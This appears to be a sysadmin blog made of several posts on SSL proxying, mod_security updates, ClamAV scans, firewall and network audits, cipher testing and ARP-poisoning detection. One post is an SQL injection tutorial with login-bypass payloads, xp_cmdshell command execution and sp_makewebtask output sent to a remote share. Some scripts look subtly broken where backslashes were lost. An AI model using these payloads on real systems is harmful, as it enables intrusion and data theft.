Force SSL for your site with Varnish and Nginx

Hello!

For those of you who depend on Varnish to offer robust caching and scaling potential to your web stack, hearing about Google’s prioritization (albeit arguably small, for now) of sites that force SSL may cause pause in how to implement.

Varnish currently doesn’t have the ability to handle SSL certificates and encrypt requests as such. It may never actually have this ability because its focus is to cache content and it does a very good job I might add.

So if Varnish can’t handle the SSL traffic directly, how would you go about implementing this with Nginx?

Well, nginx has the ability to proxy traffic. This is one of the many reasons why some admins choose to pair Varnish with Nginx. Nginx can do reverse proxying and header manipulation out of the box without custom modules or configuration. Combine that with the lightweight production tested scalability of Nginx over Apache and the reasons are simple. We’re not interested in that debate here, just a simple implementation.

Nginx Configuration

With Nginx, you will need to add an SSL listener to handle the ssl traffic. You then assign your certificate. The actual traffic is then proxied to the (already set up) non-https listener (varnish).

server {
        listen x.x.x.x:443 ssl;

        server_name yoursite.com www.yoursite.com;
        ssl_certificate /etc/nginx/ssl/yoursite.com.crt;
        ssl_certificate_key /etc/nginx/ssl/yoursite.com.key;
        ssl_protocols       TLSv1 TLSv1.1 TLSv1.2;
        ssl_ciphers         HIGH:!aNULL:!MD5;

        if ($host !~* ^www.) {
                rewrite ^(.*)$ https://www.$host$1 permanent;
        }

        location / {
            # Pass the request on to Varnish.
            proxy_pass  http://127.0.0.1:80;

            # Pass some headers to the downstream server, so it can identify the host.
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

            # Tell any web apps like Drupal that the session is HTTPS.
            proxy_set_header X-Forwarded-Proto https;

            proxy_redirect     off;
        }
}

The one thing to note before going further is the second last line of the configuration. That is important because it allows you to avoid an infinite redirect loop of a request proxying to varnish, varnish redirecting non-ssl to ssl and back to nginx for a proxy. You’ll notice that pretty quickly because your site will ultimately go down 🙁

What nginx is doing is defining a custom HTTP header and assigning a value of “https” to it :

proxy_set_header X-Forwarded-Proto https;

So the rest of the nginx configuration can remain the same (the configuration that varnish ultimately forwards requests in order to cache).

Varnish

What you’re going to need in your varnish configuration is a minor adjustment :

if (req.http.X-Forwarded-Proto !~ "(?i)https") {
    set req.http.x-Redir-Url = "https://www.yoursite.com" + req.url;
    error 750 req.http.x-Redir-Url;
}

What the above snippet is doing is simply checking if the header “X-Forwarded-Proto” (that nginx just set) exists and if the value equals (case insensitive) to “https”. If that is not present or matches , it sets a redirect to force the SSL connection which is handled by the nginx ssl proxy configuration above. Its also important to note that we are not just doing a clean break redirect, we are still appending the originating request URI in order to make it a smooth transition and potentially not break any previously ranked links/urls.

The last thing to note is the error 750 handler that handles the redirect in varnish :

sub vcl_error {
     if (obj.status == 750) {
     set obj.http.Location = obj.response;
     set obj.status = 302;
     return(deliver);
     }
 }

You can see that were using a 302 temporary redirect instead of a permanent 301 redirect. This is your decision though browsers tend to be stubborn in their own internal caching of 301 redirects so 302 is good for testing.

After restarting varnish and nginx you should be able to quickly confirm that no non-SSL traffic is allowed anymore. You can not only enjoy the (marginal) SEO “bump” but you are also contributing to the HTTPS Everywhere movement which is an important cause!

Auto updating Atomicorp Mod Security Rules

Hello!

If any of you use mod_security as a web application firewall, you might have enlisted the services of Atomicorp for regularly updating your mod_security ruleset with signatures to protect against constantly changing threats to web applications in general.

One of the initial challenges, in a managed hosting environment, was to implement a system that utilizes the Atomicorp mod_security rules and update them regularly on an automated schedule.

When you subscribe to their service, they provide access credentials in order to pull the rules. You then need to integrate the rule files into your mod_security implementation and gracefully restart apache or nginx to ensure all the updated rules are loaded.

We developed a very simple python script, intended to run as a cron scheduled task, in order to accomplish this. We thought we would share it here in case anyone else may find it useful at all to accomplish the same thing. This script could easily be modified to download rules from any similar service, alternatively. This script was written for nginx, but can be changed to be integrated with apache.

Find the code below. Enjoy!

#!/usr/bin/python
import urllib2,re,requests,tarfile,os,time

username = 'yourusername'
password = 'yourpassword'
# create a password manager
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
top_level_url = "http://updates.atomicorp.com/channels/rules/subscription/"
password_mgr.add_password(None, top_level_url, username, password)
handler = urllib2.HTTPBasicAuthHandler(password_mgr)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
#data = urllib2.urlopen('http://updates.atomicorp.com/channels/rules/subscription/VERSION')

for line in urllib2.urlopen('http://updates.atomicorp.com/channels/rules/subscription/VERSION'):
    if 'MODSEC_VERSION' in line:
        var = line.split('=',1)
        version = var[1].replace('n', '')

# they throttle connection requests
time.sleep(10)

atomicdl = 'http://updates.atomicorp.com/channels/rules/subscription/modsec-' + version + '.tar.gz'
atomicfile = urllib2.urlopen(atomicdl)
output = open('/etc/nginx/modsecurity.d/modsecrules.tar.gz', 'wb')
output.write(atomicfile.read())
output.close()

tar = tarfile.open('/etc/nginx/modsecurity.d/modsecrules.tar.gz', 'r:gz')
tar.extractall('/etc/nginx/modsecurity.d/')
tar.close()

os.system("rsync -ravzp /etc/nginx/modsecurity.d/modsec/ /etc/nginx/modsecurity.d")
os.system("rm -rf /etc/nginx/modsecurity.d/modsec /etc/nginx/modsecurity.d/modsecrules.tar.gz")
os.system("sed -i '//d' /etc/nginx/modsecurity.d/*.conf")

Security Penetration Testing Series : SQL Injection

I am starting a series of blog posts that detail security related strategies, penetration testing and best practice methodologies. To start our series, I am going to delve into the world of SQL injection techniques and a general overview for those who are looking to learn a little more about this method of injection.

There is already quite a bit of documentation out there regarding this, so I hope this post isn’t too redundant. There are a lot of tools out there to assist in accomplishing this task, or at the very least tools that assist in automating the probing and injection of SQL from publicly facing websites, forms and the like.

That tool is SQLMAP (http://sqlmap.sourceforge.net/). SQLMAP is an “open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.”

This article does not introduce anything new, SQL injection has been widely written and used in the wild. I thought I’d write this article to document some of the SQL injection methods and hope that it may be of use to some of you out there in cyberspace.

What is SQL injection anyway?

It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

What do you need?

Technically all you need is a web browser.

What should I look for?

Web forms. Any input area of a website that interacts with their database backend. Could be a login form, search form or anything like that.

You could also look for pages that actually have querystrings in the URL such as :

http://whatever.com/index.asp?id=10

Testing if its vulnerable

With those query string URLs or web forms, you could do a simple test to see if its vulnerable to injection. Start with the “single quote trick” , something like this :

hi' or 1=1--

For example :

http://whatever.com/index.asp?id=hi' or 1=1--

If you do that in a login form for example, if it works, then you will be logged in without any password necessary.

Why ‘ or 1=1–?

Let us look at another example why ‘ or 1=1– is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:

http://whatever.com/index.asp?category=food

In the URL, ‘category’ is the variable name, and ‘food’ is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM product WHERE PCategory='food'

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, ‘food’.

Now, assume that we change the URL into something like this:

http://whatever.com/index.asp?category=food' or 1=1--

Now, our variable v_cat equals to “food’ or 1=1– “, if we substitute this in the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query now should now select everything from the product table regardless if PCategory is equal to ‘food’ or not. A double dash “–” tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote (‘). Sometimes, it may be possible to replace double dash with single hash “#”.

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a 

Remote execution with SQL injection

Being able to inject SQL commands usually means we can execute any SQL query at will.Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (“) if single quote (‘) is not working.

The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

Getting the output of my SQL query

It is possible to use sp_makewebtask to write your query into an HTML:

'; EXEC master..sp_makewebtask "10.10.1.3shareoutput.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must folder “share” sharing for Everyone.

Hope this helps!

Scheduled antivirus scans to prevent viral injections on user generated content

When dealing with high traffic sites, especially media based or community based sites, there is always the risk of javascript, virus, XSS or other malicious injection of badness when giving a community of users the ability to upload files to your site.

There are several things to consider when evaluating all “points of entry” that are available to the public, into your systems.

Most content management and community based systems use libraries such as Imagemagick to process images (such as profile pictures) into their proper format and size.

Believe it or not, it is hard to actually inject code or other malicious data into the actual image to survive this sanitizing process. There is still risks , however. The library version you are running may be vulnerable to exploits itself.

As always, a good rule of thumb is to ensure all possible aspects of your systems are up to date and that you are aware of any security vulnerabilities as they come out so they can either be patched or addressed in some other way.

One thing to consider, especially when dealing with thousands of users and even more uploads is a scheduled scan of your user uploads using free virus scanning tools such as clamscan. This is an endpoint reporting strategy that can at least cover your ass in the event that something else was missed or a 0day vulnerability exploited.

It should be noted that the virus scans themselves aren’t intended to protect the linux systems themselves, but rather the opportunistic ‘spreading’ of compromised images and code that having an infected file on a public community based system can provide.

Its very simple to implement clamav (daemonization is not necessary), clamscan is all we need to execute regular scans at 10, 15, 30 or 60 minute intervals.

Once clamscan is implemented, definitions updated (and regular update cronjobs in place) you can roll out a script similar to the one we have here to implement the scheduled scans :

#!/bin/bash
# Scheduled Scan of user uploaded files
# Usage : ./virusscan.sh /folder


SUBJECT="[VIRUS DETECTED] ON `hostname` !"
EMAIL="you@yourdomain.com"
LOG=/var/log/clamav/scan.log

# Clear out old logs -- the email alerts should be archived if we need to go back to old alerts
echo "" > $LOG

# Check if the folder is empty -- only scan if this is an active node in a clustered system
# look for empty dir
if [ "$(ls -A $1)" ]
then
        # Scan files 
        clamscan $1 -r --infected --scan-pdf --scan-elf --log=$LOG

        # Check the last set of results. If there are any "Infected" counts that aren't zero, we have a problem.
        cat $LOG | grep Infected | grep -v 0
        if [ $? = 0 ]
        then
                cat $LOG | mail -s "$SUBJECT" $EMAIL -- -F Antivirus -f antivirus@yourdomain.com
        fi

else
        echo "directory empty -- doing nothing"
        exit 0;
fi

The actual cronjob entry can look something like this :

0 */1 * * * /bin/bash /usr/local/bin/virusscan.sh "/your/path/to/user/uploaded/files/" > /dev/null 2>&1

It seems like a rather simple solution — but it does provide a venue for additional sanitizing of user input. In our experience , it is best to only report on anything that clamscan might find. You can, however tell clamscan to simply delete any suspected infections it finds.

Shell Script to Report On Hacking Attempts

It is always a good idea , when implementing open source firewall implementations (iptables, pf, etc), to build in as much reporting and verbosity as possible.

Having verbose reports on the state of your firewall, intrusion attempts and other information is key to ensuring the health and integrity of your network.

Somewhere along the line, we wrote a script to provide daily reports on intrusion attempts to penetrate our network — this usually happens when someone exceeds certain connection thresholds.

It may not be the most informative data, but the script can be modified to provide other important statistical information. It can also be modified to be used with other firewall implementations. I’m certain it wouldn’t be hard to convert this script to utilise iptables.

Below you will find the script itself — it can be set to run daily as a cronjob perhaps. Also note that the script tries to resolve a hostname for the IP address to at least provide some quick & easy information to the security administrators when determining coordinated attacks or attacks coming from compromised systems.

#!/bin/bash
# SDH PFCTL Daily Hack Table check

yesterday1=`date -v -1d +"%b"`
yesterday2=`date -v -1d +"%e"`
yesterday_display=`date -v -1d +"%b %d %Y"`

echo "" > /var/log/tablecheck.log

/sbin/pfctl -vvsTables > /var/log/pfctltables.log

echo "Firewall Table Audit: " $yesterday_display >> /var/log/tablecheck.log
echo -e "----------------------------------">> /var/log/tablecheck.log
echo -e "" >> /var/log/tablecheck.log

for obj0 in $(cat /var/log/pfctltables.log | grep "-pa-r-" | awk -F "t" '{printf "%sn", $2}');
do
echo -e $obj0 "TABLE" >> /var/log/tablecheck.log
echo -e "--------------" >> /var/log/tablecheck.log

# this is because the date command outputs single digit non-aligned right, but pfctl doesnt display that way :(
if [ "$yesterday2" -le 9 ]
then
        /sbin/pfctl -t $obj0 -Tshow -vv | grep -A 4 -B 1 "$yesterday1  $yesterday2" >> /var/log/tablecheck.log 2>&1
else
        /sbin/pfctl -t $obj0 -Tshow -vv | grep -A 4 -B 1 "$yesterday1 $yesterday2" >> /var/log/tablecheck.log 2>&1
fi

if [ "$?" -eq 1 ]
then
        echo -e "No values found for yesterday" >> /var/log/tablecheck.log
        echo -e "" >> /var/log/tablecheck.log
else
        echo -e "Hostnames :" >> /var/log/tablecheck.log
        for obj1 in $(/sbin/pfctl -t $obj0 -Tshow -vv | grep -B 1 "$yesterday1 $yesterday2" | grep -v "Cleared" | grep -v "--");
        do
        iphostnm=`/usr/bin/nslookup $obj1 | grep -A1 "Non-authoritative answer" | grep "name" | awk -F "=" '{printf "%sn", $2}'`
        if [ "$?" -eq 0 ]
        then
                echo -e "$obj1 / $iphostnm" >> /var/log/tablecheck.log
        else
                echo -e "$obj1 / No host name found" >> /var/log/tablecheck.log
        fi
        done
       echo -e "" >> /var/log/tablecheck.log
fi


done

cat /var/log/tablecheck.log | mail -s "Firewall Table Report" you@youremail.com

Enjoy!

Network Audit Bash Script Using Netbios and Nmap

Working in a large office, it is sometimes necessary to use different network audit tools in order to properly assess the integrity and security of networks.

In order to quickly audit a network , I created this script to scan selected IPs, read from a configuration file, and compile a simple report to be emailed. The script can be modified to suit your needs, such as exporting the data to a database or perhaps an HTML report for a web based reporting site.

The script itself doesn’t do anything particularly special, however it has proven useful when you want to do a quick & dirty network audit.

There are other tools out there, such as OpenAudit, Nessus and Nmap that could do similar tasks. However, the important thing to remember here is that those tools (with the exception of open audit perhaps) can be incorporated into this script to perform regular scheduled audits.

This script could actually be updated to utilize nmap v5.0 — utilizing the new features plus ndiff could turn this script into a very powerful network analysis tool.

Hopefully some of you will find some use out of the script! Enjoy!

#!/bin/sh


# Basic Information Gathering
currentmonth=`date "+%Y-%m-%d"`

rm lindows.log

echo "Hostname Identification Audit: " $currentmonth >> lindows.log
echo -e "------------------------------------------" >> lindows.log
echo -e >> lindows.log
for obj0 in $(grep -v "^#" all_linux_windows_ips.txt);
do


# Check if windows
check=`nmap -e bge0 -p 3389 $obj0 | grep open`

if [ "$?" -eq 0 ]
        then
        windowshost=`nbtscan -v -s , $obj0 | head -n 1 | awk -F"," '{printf "%s", $2}'`
        if [ -n "${windowshost:+x}" ]
                then
                echo -e "$windowshostt: $obj0t: WINDOWS" >> lindows.log
                else
                echo -e "NETBIOS UNKOWNt: $obj0t: WINDOWS" >> lindows.log
        fi
        else
        # Check if linux or freebsd
        ssh_get=`ssh -l ims $obj0 '(uname | sed 'y/abcdefghijklmnopqrstuvwxyz/ABCDEFGHIJKLMNOPQRSTUVWXYZ/' && hostname | sed 'y/abcdefghijklmnopqrstuvwxyz/ABCDEFGHIJKLMNOPQRSTUVWXYZ/')'`
        if [ "$?" -eq 0 ]
                then
                uname=`echo $ssh_get | awk -F" " '{printf "%s", $1}'`
                hostname1=`echo $ssh_get | awk -F" " '{printf "%s", $2}'`
                hostname2=`echo $hostname1 | awk -F"." '{printf "%s", $1}'`
                echo -e "$hostname2t: $obj0t: $uname" >> lindows.log
                else
                echo -e "UNKNOWN ERRORt: $obj0t: PLEASE CHECK HOST" >> lindows.log
        fi
fi
done

cat lindows.log | mail -s 'Windows/FreeBSD/Linux Host Audit' your@email.com

Note that the “all_windows_linux_ips.txt” is just a text file with the ip addresses of all hostnames on your network. It can be modified to simply utilize whole subnets to make it easier to perform the audit.

Testing for weak SSL ciphers for security audits

During security audits, such as a PCI-DSS compliance audit, it is very commonplace to test the cipher mechanism that a website / server uses and supports to ensure that weak / outdated cipher methods are not used.

Weak ciphers allow for an increased risk in encryption compromise, man-in-the-middle attacks and other related attack vectors.

Due to historic export restrictions of high grade cryptography, legacy and new web servers are often able and configured to handle weak cryptographic options.

Even if high grade ciphers are normally used and installed, some server misconfiguration could be used to force the use of a weaker cipher to gain access to the supposed secure communication channel.

Testing SSL / TLS cipher specifications and requirements for site

The http clear-text protocol is normally secured via an SSL or TLS tunnel, resulting in https traffic. In addition to providing encryption of data in transit, https allows the identification of servers (and, optionally, of clients) by means of digital certificates.

Historically, there have been limitations set in place by the U.S. government to allow cryptosystems to be exported only for key sizes of, at most, 40 bits, a key length which could be broken and would allow the decryption of communications. Since then, cryptographic export regulations have been relaxed (though some constraints still hold); however, it is important to check the SSL configuration being used to avoid putting in place cryptographic support which could be easily defeated. SSL-based services should not offer the possibility to choose weak ciphers.

Testing for weak ciphers : examples

In order to detect possible support of weak ciphers, the ports associated to SSL/TLS wrapped services must be identified. These typically include port 443, which is the standard https port; however, this may change because a) https services may be configured to run on non-standard ports, and b) there may be additional SSL/TLS wrapped services related to the web application. In general, a service discovery is required to identify such ports.

The nmap scanner, via the “–sV” scan option, is able to identify SSL services. Vulnerability Scanners, in addition to performing service discovery, may include checks against weak ciphers (for example, the Nessus scanner has the capability of checking SSL services on arbitrary ports, and will report weak ciphers).

Example 1. SSL service recognition via nmap.

[root@test]# nmap -F -sV localhost

Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-07-27 14:41 CEST
Interesting ports on localhost.localdomain (127.0.0.1):
(The 1205 ports scanned but not shown below are in state: closed)

PORT      STATE SERVICE         VERSION
443/tcp   open  ssl             OpenSSL
901/tcp   open  http            Samba SWAT administration server
8080/tcp  open  http            Apache httpd 2.0.54 ((Unix) mod_ssl/2.0.54 OpenSSL/0.9.7g PHP/4.3.11)
8081/tcp  open  http            Apache Tomcat/Coyote JSP engine 1.0

Nmap run completed -- 1 IP address (1 host up) scanned in 27.881 seconds
[root@test]# 

Example 2. Identifying weak ciphers with Nessus. The following is an anonymized excerpt of a report generated by the Nessus scanner, corresponding to the identification of a server certificate allowing weak ciphers

 https (443/tcp)
 Description
 Here is the SSLv2 server certificate:
 Certificate:
 Data:
 Version: 3 (0x2)
 Serial Number: 1 (0x1)
 Signature Algorithm: md5WithRSAEncryption
 Issuer: C=**, ST=******, L=******, O=******, OU=******, CN=******
 Validity
 Not Before: Oct 17 07:12:16 2002 GMT
 Not After : Oct 16 07:12:16 2004 GMT
 Subject: C=**, ST=******, L=******, O=******, CN=******
 Subject Public Key Info:
 Public Key Algorithm: rsaEncryption
 RSA Public Key: (1024 bit)
 Modulus (1024 bit):
 00:98:4f:24:16:cb:0f:74:e8:9c:55:ce:62:14:4e:
 6b:84:c5:81:43:59:c1:2e:ac:ba:af:92:51:f3:0b:
 ad:e1:4b:22:ba:5a:9a:1e:0f:0b:fb:3d:5d:e6:fc:
 ef:b8:8c:dc:78:28:97:8b:f0:1f:17:9f:69:3f:0e:
 72:51:24:1b:9c:3d:85:52:1d:df:da:5a:b8:2e:d2:
 09:00:76:24:43:bc:08:67:6b:dd:6b:e9:d2:f5:67:
 e1:90:2a:b4:3b:b4:3c:b3:71:4e:88:08:74:b9:a8:
 2d:c4:8c:65:93:08:e6:2f:fd:e0:fa:dc:6d:d7:a2:
 3d:0a:75:26:cf:dc:47:74:29
 Exponent: 65537 (0x10001)
 X509v3 extensions:
 X509v3 Basic Constraints:
 CA:FALSE
 Netscape Comment:
 OpenSSL Generated Certificate
 Page 10
 Network Vulnerability Assessment Report 25.05.2005
 X509v3 Subject Key Identifier:
 10:00:38:4C:45:F0:7C:E4:C6:A7:A4:E2:C9:F0:E4:2B:A8:F9:63:A8
 X509v3 Authority Key Identifier:
 keyid:CE:E5:F9:41:7B:D9:0E:5E:5D:DF:5E:B9:F3:E6:4A:12:19:02:76:CE
 DirName:/C=**/ST=******/L=******/O=******/OU=******/CN=******
 serial:00
 Signature Algorithm: md5WithRSAEncryption
 7b:14:bd:c7:3c:0c:01:8d:69:91:95:46:5c:e6:1e:25:9b:aa:
 8b:f5:0d:de:e3:2e:82:1e:68:be:97:3b:39:4a:83:ae:fd:15:
 2e:50:c8:a7:16:6e:c9:4e:76:cc:fd:69:ae:4f:12:b8:e7:01:
 b6:58:7e:39:d1:fa:8d:49:bd:ff:6b:a8:dd:ae:83:ed:bc:b2:
 40:e3:a5:e0:fd:ae:3f:57:4d:ec:f3:21:34:b1:84:97:06:6f:
 f4:7d:f4:1c:84:cc:bb:1c:1c:e7:7a:7d:2d:e9:49:60:93:12:
 0d:9f:05:8c:8e:f9:cf:e8:9f:fc:15:c0:6e:e2:fe:e5:07:81:
 82:fc
 Here is the list of available SSLv2 ciphers:
 RC4-MD5
 EXP-RC4-MD5
 RC2-CBC-MD5
 EXP-RC2-CBC-MD5
 DES-CBC-MD5
 DES-CBC3-MD5
 RC4-64-MD5

The SSLv2 server offers 5 strong ciphers, but also 0 medium strength and 2 weak "export class" ciphers.
The weak/medium ciphers may be chosen by an export-grade or badly configured client software. They only offer a limited protection against a brute force attack

Solution: disable those ciphers and upgrade your client software if necessary.
See http://support.microsoft.com/default.aspx?scid=kben-us216482 or http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslciphersuite  This SSLv2 server also accepts SSLv3 connections. This SSLv2 server also accepts TLSv1 connections.
 
 Vulnerable hosts
 (list of vulnerable hosts follows)

Example 3. Manually audit weak SSL cipher levels with OpenSSL. The following will attempt to connect to Google.com with SSLv2.

[root@test]# openssl s_client -no_tls1 -no_ssl3 -connect www.google.com:443
CONNECTED(00000003)
depth=0 /C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 /C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com
verify error:num=27:certificate not trusted
verify return:1
depth=0 /C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com
verify error:num=21:unable to verify the first certificate
verify return:1
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIDYzCCAsygAwIBAgIQYFbAC3yUC8RFj9MS7lfBkzANBgkqhkiG9w0BAQQFADCB
zjELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJ
Q2FwZSBUb3duMR0wGwYDVQQKExRUaGF3dGUgQ29uc3VsdGluZyBjYzEoMCYGA1UE
CxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjEhMB8GA1UEAxMYVGhh
d3RlIFByZW1pdW0gU2VydmVyIENBMSgwJgYJKoZIhvcNAQkBFhlwcmVtaXVtLXNl
cnZlckB0aGF3dGUuY29tMB4XDTA2MDQyMTAxMDc0NVoXDTA3MDQyMTAxMDc0NVow
aDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAUBgNVBAcTDU1v
dW50YWluIFZpZXcxEzARBgNVBAoTCkdvb2dsZSBJbmMxFzAVBgNVBAMTDnd3dy5n
b29nbGUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/e2Vs8U33fRDk
5NNpNgkB1zKw4rqTozmfwty7eTEI8PVH1Bf6nthocQ9d9SgJAI2WOBP4grPj7MqO
dXMTFWGDfiTnwes16G7NZlyh6peT68r7ifrwSsVLisJp6pUf31M5Z3D88b+Yy4PE
D7BJaTxq6NNmP1vYUJeXsGSGrV6FUQIDAQABo4GmMIGjMB0GA1UdJQQWMBQGCCsG
AQUFBwMBBggrBgEFBQcDAjBABgNVHR8EOTA3MDWgM6Axhi9odHRwOi8vY3JsLnRo
YXd0ZS5jb20vVGhhd3RlUHJlbWl1bVNlcnZlckNBLmNybDAyBggrBgEFBQcBAQQm
MCQwIgYIKwYBBQUHMAGGFmh0dHA6Ly9vY3NwLnRoYXd0ZS5jb20wDAYDVR0TAQH/
BAIwADANBgkqhkiG9w0BAQQFAAOBgQADlTbBdVY6LD1nHWkhTadmzuWq2rWE0KO3
Ay+7EleYWPOo+EST315QLpU6pQgblgobGoI5x/fUg2U8WiYj1I1cbavhX2h1hda3
FJWnB3SiXaiuDTsGxQ267EwCVWD5bCrSWa64ilSJTgiUmzAv0a2W8YHXdG08+nYc
X/dVk5WRTw==
-----END CERTIFICATE-----
subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com
issuer=/C=ZA/ST=Western Cape/L=Cape Town/O=Thawte Consulting cc/OU=Certification Services Division/CN=Thawte Premium Server CA/emailAddress=premium-server@thawte.com
---
No client certificate CA names sent
---
Ciphers common between both SSL endpoints:
RC4-MD5         EXP-RC4-MD5     RC2-CBC-MD5
EXP-RC2-CBC-MD5 DES-CBC-MD5     DES-CBC3-MD5
RC4-64-MD5
---
SSL handshake has read 1023 bytes and written 333 bytes
---
New, SSLv2, Cipher is DES-CBC3-MD5
Server public key is 1024 bit
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : SSLv2
    Cipher    : DES-CBC3-MD5
    Session-ID: 709F48E4D567C70A2E49886E4C697CDE
    Session-ID-ctx:
    Master-Key: 649E68F8CF936E69642286AC40A80F433602E3C36FD288C3
    Key-Arg   : E8CB6FEB9ECF3033
    Start Time: 1156977226
    Timeout   : 300 (sec)
    Verify return code: 21 (unable to verify the first certificate)
---
closed

These tests usually provide a very in-depth and reliable method for ensuring weak and vulnerable ciphers are not used in order to comply with said audits.

Personally, I prefer the nessus audit scans. Usually the default “free” plugins are enough to complete these types of one-off audits. There are, however, commercial nessus plugins designed just for PCI-DSS compliance audits and are available for purchase from the nessus site.

Detect ARP poisoning on LAN

ARP Poisoning : Potential MITM attack

Occasionally during security audits it may be necessary to check your LAN for rogue machines. All the potential rogue machine in your LAN needs to do is poison your ARP cache so that the cache thinks that the attacker is the router or the destination machine. Then all packets to that machine will go through the rogue machine, and it will be, from the network’s standpoint, between the client and the server, even though technically it’s just sitting next to them. This is actually fairly simple to do, and is also fairly easy to detect as a result.

In this sample case, the rogue machine was in a different room but still on the same subnet. Through simple ARP poisoning it convinced the router that it was our server, and convinced the server that it was the router. It then had an enjoyable time functioning as both a password sniffer and a router for unsupported protocols.

By simply pinging all the local machines (nmap -sP 192.168.1.0/24 will do this quickly) and then checking the ARP table (arp -an) for duplicates, you can detect ARP poisoning quite quickly.

$ arp -an| awk '{print $4}'| sort | uniq -c | grep -v ' 1 '
    5 F8:F0:11:15:34:51
   88 

Then I simply looked at the IP addresses used by that ethernet address in ‘arp -an’ output, ignoring those that were blatantly poisoned (such as the router) and looked up the remaining address in DNS to see which machine it was.

Below is a script I wrote to automate this process (perhaps in a cron job) , and send out an alert email if any ARP poisoning is detected.

ARP Poisoning Check Script

This can ideally run as a cronjob (i.e. 30 * * * *)

#!/bin/sh
# Star Dot Hosting
# detect arp poisoning on LAN

currentmonth=`date "+%Y-%m-%d %H:%M:%S"`
logpath="/var/log"


rm $logpath/arpwatch.log


echo "ARP Poisoning Audit: " $currentmonth >> $logpath/arpwatch.log
echo -e "-----------------------------------------" >> $logpath/arpwatch.log
echo -e >> $logpath/arpwatch.log

arp -an | awk '{print $4}' | sort | uniq -c | grep -v ' 1 '

if [ "$?" -eq 0 ]
then
        arp -an | awk '{print $4}' | sort | uniq -c | grep -v ' 1 ' >> $logpath/arpwatch.log 2>&1
        cat $logpath/arpwatch.log | mail -s 'Potential ARP Poisoning ALERT!' your@email.com
else
echo -e "No potential ARP poisoning instances found..." >> $logpath/arpwatch.log
fi

Simple!

Creating a FreeBSD wireless access point

Access points are essentially wireless switches or hubs. Just like a switch or a hub, all clients communicate through the access point. FreeBSD allows us to easily create an access point with just very little configuration and just the right hardware

To set up a wireless access point using FreeBSD, you need to have a compatible wireless card. We are using a Prism 2-based chipset. For a complete list of cards that are supported, consult the man page for wi, or visit the Wireless Network Interface Section of the FreeBSD documentation site.

    • Configuring the kernel
  • Depending on how you wish to set up the access point will determine what options need to be added to the kernel config file. If the wireless network device is being installed on a server that is currently running as a Firewall/NAT, then we only need to compile the wireless device driver into the kernel:

    # Wireless NIC cards
    device          wlan            # 802.11 support
    device          an              # Aironet 4500/4800 802.11 wireless NICs.
    device          awi             # BayStack 660 and others
    device          wi              # WaveLAN/Intersil/Symbol 802.11 wireless NICs.
    device          wl              # Older non 802.11 Wavelan wireless NIC.

    Choose the appropriate driver for your card from the list and include the wlan device, then recompile and install your kernel.

    If this the wireless network device is going to be installed on a system that does not serve as a Firewall/NAT, then we would want to include the BRIDGE option, along with the appropriate wireless device driver in the kernel config file.

    # Ethernet bridging support
    option		BRIDGE
    
    # Wireless NIC cards
    device          wlan            # 802.11 support
    device          an              # Aironet 4500/4800 802.11 wireless NICs.
    device          awi             # BayStack 660 and others
    device          wi              # WaveLAN/Intersil/Symbol 802.11 wireless NICs.
    device          wl              # Older non 802.11 Wavelan wireless NIC.
    

    The bridging option will allow the wireless device to communicate with the wired ethernet interface. We must also add a couple of options to the /etc/sysctl.conf file in order to establish the bridge between the two interfaces:

    net.inet.ip.forwarding=1
    net.link.ether.bridge.enable=1
    net.link.ether.bridge.config=wi0,fxp0

    Be sure and replace fxp0 with whatever wired ethernet interface you are using with your FreeBSD installation. For information on bridging, consult the Bridging Section of the FreeBSD Handbook.

      Configuring the Wireless Interface

    The configuration of the wireless interface is fairly straightforward, we just need to add a few more options than if it were a wired ethernet interface. The following is an example of ifconfig options for a wireless interface:

    ifconfig wi0 inet 10.0.0.5 netmask 255.255.255.0 
